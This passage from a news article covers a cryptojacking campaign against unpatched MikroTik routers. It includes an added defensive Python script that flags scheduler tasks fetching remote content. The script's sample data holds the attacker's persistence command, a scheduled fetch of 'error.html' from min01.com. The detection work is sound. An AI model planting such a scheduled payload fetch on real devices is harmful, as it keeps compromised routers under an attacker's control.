Mr Kenin also noted: “The attacker is clearly showing a high level of understanding of how these MikroTik routers work.”
“This can be seen in the persistence mechanism of the attacker: The attacker scheduled a task which connects to another host “min01.com” and fetches a new “error.html” file.”
“This was probably put in place in case CoinHive blocked the attacker’s current site-key and it had to be replaced with another,” he added.
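The persistence mechanism Kenin describes (a scheduled task that periodically fetches a file from an external host) is something a defender can look for in a router's scheduler export. The following is an added example, not code from the article or from Trustwave: it parses a constructed RouterOS `/system scheduler export` listing (the export format and the task names are assumptions; only the hostname `min01.com` and file name `error.html` come from the article) and flags tasks whose script fetches remote content.

```python
import re

# Constructed sample of a RouterOS "/system scheduler export" listing.
# The line format is assumed; "min01.com" and "error.html" come from the article.
SAMPLE_EXPORT = """\
/system scheduler
add interval=1d name=backup on-event="/system backup save name=nightly" policy=read,write start-time=startup
add interval=10m name=update on-event="/tool fetch address=min01.com src-path=error.html mode=http" policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=startup
"""

ADD_LINE = re.compile(r'^add\s+(?P<attrs>.*)$')
# key=value pairs; values are either a double-quoted string or a run of non-spaces
ATTR = re.compile(r'(\w[\w-]*)=("([^"]*)"|\S+)')
ADDRESS = re.compile(r'address=(\S+)')


def parse_scheduler_export(text):
    """Return one dict of attributes per 'add' line in the export."""
    entries = []
    for line in text.splitlines():
        m = ADD_LINE.match(line.strip())
        if not m:
            continue  # header lines such as "/system scheduler"
        attrs = {}
        for key, raw, quoted in ATTR.findall(m.group('attrs')):
            attrs[key] = quoted if raw.startswith('"') else raw
        entries.append(attrs)
    return entries


def flag_remote_fetch_tasks(entries):
    """Flag scheduled tasks whose on-event script pulls content from a remote host."""
    flagged = []
    for entry in entries:
        script = entry.get('on-event', '')
        if re.search(r'\bfetch\b', script):
            host = ADDRESS.search(script)
            flagged.append({
                'name': entry.get('name'),
                'interval': entry.get('interval'),
                'host': host.group(1) if host else None,
            })
    return flagged


if __name__ == '__main__':
    for hit in flag_remote_fetch_tasks(parse_scheduler_export(SAMPLE_EXPORT)):
        print(f"suspicious scheduler task {hit['name']!r}: fetches from {hit['host']} every {hit['interval']}")
```

A periodic fetch from an unfamiliar host in the scheduler is the indicator to review; a legitimate backup job like the first entry is not flagged.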
MikroTik is a manufacturer of computer networking equipment, with a particular focus on wireless devices and routers; it was founded in Latvia in 1995.
The vulnerability being exploited was in fact patched very quickly once it was discovered last April: MikroTik promptly issued an update for the affected routers.
However, there is nothing more they can do in this situation, except advise IT workers with unpatched routers to install the latest software version immediately.
Interestingly, Kenin could see the attacker trying to cover their tracks: “I noticed this script being updated a few times while working on this blog. The attacker seems to be adding more cleanup commands to leave a smaller footprint and reduce risk of being detected.”
This article is from the CBROnline archive: some formatting and images may not be present.